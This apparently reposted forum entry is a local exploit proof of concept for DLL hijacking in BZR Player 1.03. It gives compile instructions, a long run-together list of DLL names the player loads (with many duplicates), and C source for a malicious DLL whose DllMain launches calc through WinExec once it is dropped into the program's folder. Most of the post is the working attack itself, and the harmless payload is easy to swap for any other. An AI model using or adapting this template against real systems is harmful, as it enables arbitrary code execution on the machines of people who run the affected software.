Aerosol Posted April 1, 2015 Report Posted April 1, 2015 /*#[+] Author: TUNISIAN CYBER#[+] Exploit Title: BZR Player 1.03 DLL Hijacking#[+] Date: 29-03-2015#[+] Type: Local Exploits#[+] Vendor: http://bzrplayer.blazer.nu/#[+] Tested on: WinXp/Windows 7 Pro#[+] Friendly Sites: sec4ever.com#[+] Twitter: @TCYB3R#[+] gcc -shared -o [DLLNAME_choose one from the lis below].dll tcyber.c# Copy it to the software dir. then execute the software , calc.exe will launch .#Vulnerable and Exploitable DLLs:output_dsound.dllcodec_cdda.dlloutput_writer_nrt.dlloutput_nosound.dlloutput_nosound_nrt.dllcodec_tag.dllcodec_cdda.dllcodec_fsb.dllcodec_vag.dllcodec_.dllcodec_oggvorbis.dllcodec_tremor.dllcodec_fsb.dllcodec_aiff.dllcodec_flac.dllcodec_mod.dllcodec_s3m.dllcodec_xm.dllcodec_it.dllcodec_midi.dllcodec_dls.dllcodec_sf2.dllcodec_asf.dllcodec_vag.dllcodec_playlist.dllcodec_mpeg.dlldsp_oscillator.dlldsp_fft.dlldsp_lowpass.dlldsp_lowpass2.dlldsp_lowpass_simple.dlldsp_highpass.dlldsp_echo.dlldsp_delay.dllcodec_.dlldsp_flange.dlldsp_tremolo.dlldsp_distortion.dlldsp_normalize.dlldsp_parameq.dlldsp_pitchshift.dlldsp_chorus.dlldsp_reverb.dlldsp_sfxreverb.dlldsp_itecho.dllcodec_oggvorbis.dlldsp_compressor.dlldsp_dolbyheadphones.dlloutput_dsound.dlloutput_winmm.dlloutput_wasapi.dlloutput_asio.dlloutput_writer.dlloutput_writer_nrt.dlloutput_nosound.dlloutput_nosound_nrt.dllcodec_tremor.dllcodec_tag.dllcodec_cdda.dllcodec_fsb.dllcodec_vag.dllcodec_.dllcodec_oggvorbis.dllcodec_tremor.dllcodec_aiff.dllcodec_flac.dllcodec_mod.dllcodec_aiff.dllcodec_s3m.dllcodec_xm.dllcodec_it.dllcodec_midi.dllcodec_dls.dllcodec_sf2.dllcodec_asf.dllcodec_playlist.dllcodec_mpeg.dlldsp_oscillator.dllcodec_flac.dlldsp_fft.dlldsp_lowpass.dlldsp_lowpass2.dlldsp_lowpass_simple.dlldsp_highpass.dlldsp_echo.dlldsp_delay.dlldsp_flange.dlldsp_tremolo.dlldsp_distortion.dllcodec_mod.dlldsp_normalize.dlldsp_parameq.dlldsp_pitchshift.dlldsp_chorus.dlldsp_reverb.dlldsp_sfxreverb.dlldsp_itecho.dlldsp_compressor.dlldsp_dolbyheadphones.dlloutput_dsound.dllcodec_s3m.dlloutput_winmm.dlloutput_wasapi.dlloutput_asio.dlloutput_writer.dlloutput_writer_nrt.dlloutput_nosound.dlloutput_nosound_nrt.dllcodec_tag.dllcodec_cdda.dllcodec_fsb.dlloutput_winmm.dllcodec_xm.dllcodec_vag.dllcodec_.dllcodec_oggvorbis.dllcodec_tremor.dllcodec_aiff.dllcodec_flac.dllcodec_mod.dllcodec_s3m.dllcodec_xm.dllcodec_it.dllcodec_it.dllcodec_midi.dllcodec_dls.dllcodec_sf2.dllcodec_asf.dllcodec_playlist.dllcodec_mpeg.dlldsp_oscillator.dlldsp_fft.dlldsp_lowpass.dlldsp_lowpass2.dllcodec_midi.dlldsp_lowpass_simple.dlldsp_highpass.dlldsp_echo.dlldsp_delay.dlldsp_flange.dlldsp_tremolo.dlldsp_distortion.dlldsp_normalize.dlldsp_parameq.dlldsp_pitchshift.dllcodec_dls.dlldsp_chorus.dlldsp_reverb.dlldsp_sfxreverb.dlldsp_itecho.dlldsp_compressor.dlldsp_dolbyheadphones.dllcodec_sf2.dllcodec_asf.dllcodec_playlist.dllcodec_mpeg.dlldsp_oscillator.dlldsp_fft.dlloutput_wasapi.dlldsp_lowpass.dlldsp_lowpass2.dlldsp_lowpass_simple.dlldsp_highpass.dlldsp_echo.dlldsp_delay.dlldsp_flange.dlldsp_tremolo.dlldsp_distortion.dlldsp_normalize.dlloutput_asio.dlldsp_parameq.dlldsp_pitchshift.dlldsp_chorus.dlldsp_reverb.dlldsp_sfxreverb.dlldsp_itecho.dlldsp_compressor.dlldsp_dolbyheadphones.dlloutput_dsound.dlloutput_winmm.dlloutput_writer.dlloutput_wasapi.dlloutput_asio.dlloutput_writer.dlloutput_writer_nrt.dlloutput_nosound.dlloutput_nosound_nrt.dllcodec_tag.dllcodec_cdda.dllcodec_fsb.dllcodec_vag.dlloutput_writer_nrt.dllcodec_.dllcodec_oggvorbis.dllcodec_tremor.dllcodec_aiff.dllcodec_flac.dllcodec_mod.dllcodec_s3m.dllcodec_xm.dllcodec_it.dllcodec_midi.dlloutput_nosound.dllcodec_dls.dllcodec_sf2.dllcodec_asf.dllcodec_playlist.dllcodec_mpeg.dlldsp_oscillator.dlldsp_fft.dlldsp_lowpass.dlldsp_lowpass2.dlldsp_lowpass_simple.dlloutput_nosound_nrt.dlldsp_highpass.dlldsp_echo.dlldsp_delay.dlldsp_flange.dlldsp_tremolo.dlldsp_distortion.dlldsp_normalize.dlldsp_parameq.dlldsp_pitchshift.dlldsp_chorus.dllcodec_tag.dlldsp_reverb.dlldsp_sfxreverb.dlldsp_itecho.dlldsp_compressor.dlldsp_dolbyheadphones.dlloutput_dsound.dlloutput_winmm.dlloutput_wasapi.dlloutput_asio.dlloutput_writer.dll#Proof of Concept (PoC):=======================*/#include <windows.h>int tunisian(){WinExec("calc", 0);exit(0);return 0;}BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved){tunisian();return 0;}Source Quote